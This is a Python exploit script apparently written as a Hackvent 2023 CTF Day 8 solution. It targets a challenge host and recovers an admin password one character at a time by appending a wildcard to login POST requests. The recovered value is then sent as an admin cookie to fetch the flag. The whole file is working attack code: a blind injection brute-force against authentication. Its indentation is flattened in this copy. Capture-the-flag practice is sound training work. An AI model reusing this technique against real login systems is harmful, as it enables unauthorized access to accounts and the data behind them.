Hackvent_2023/Day 8/exploit.py

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2023-12-18 16:02:49 +01:00
#!/usr/bin/env python
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
# https://git.romanh.de/Roman/HackingScripts
import string
import os
import re
import sys
import json
import time
import base64
import requests
import subprocess
import urllib.parse
from bs4 import BeautifulSoup
from hackingscripts import util, rev_shell
from hackingscripts.fileserver import HttpFileServer
from urllib3.exceptions import InsecureRequestWarning
BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else ""
IP_ADDRESS = util.get_address()
def request(method, uri, **kwargs):
if not uri.startswith("/") and uri != "":
uri = "/" + uri
client = requests
if "session" in kwargs:
client = kwargs["session"]
del kwargs["session"]
if "allow_redirects" not in kwargs:
kwargs["allow_redirects"] = False
if "verify" not in kwargs:
kwargs["verify"] = False
if "proxies" not in kwargs:
kwargs["proxies"] = {"http":"", "https":""}
return client.request(method, BASE_URL + uri, **kwargs)
def login(password):
while True:
# post payload is not URL decoded, so we can't use dictionary
res = request("POST", "/login", data=f"password={password}")
if "Successfully logged in" in res.text:
return True
elif "Invalid username or password!" in res.text:
return False
def retrieve_flag(cookie):
while True:
res = request("GET", "/admin", cookies={"admin_token": cookie})
util.assert_content_type(res, "text/html")
if "You are not authorized to view this page." in res.text:
return None
match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
if match:
return match[1]
if __name__ == "__main__":
password = "salami"
flag = retrieve_flag(password)
while flag is None:
found = False
for x in string.printable:
if x in ["*", "\\"]:
if login(password + x + "*"):
password += x
found = True
flag = retrieve_flag(password)
if not found:
print("[+] Flag:", flag)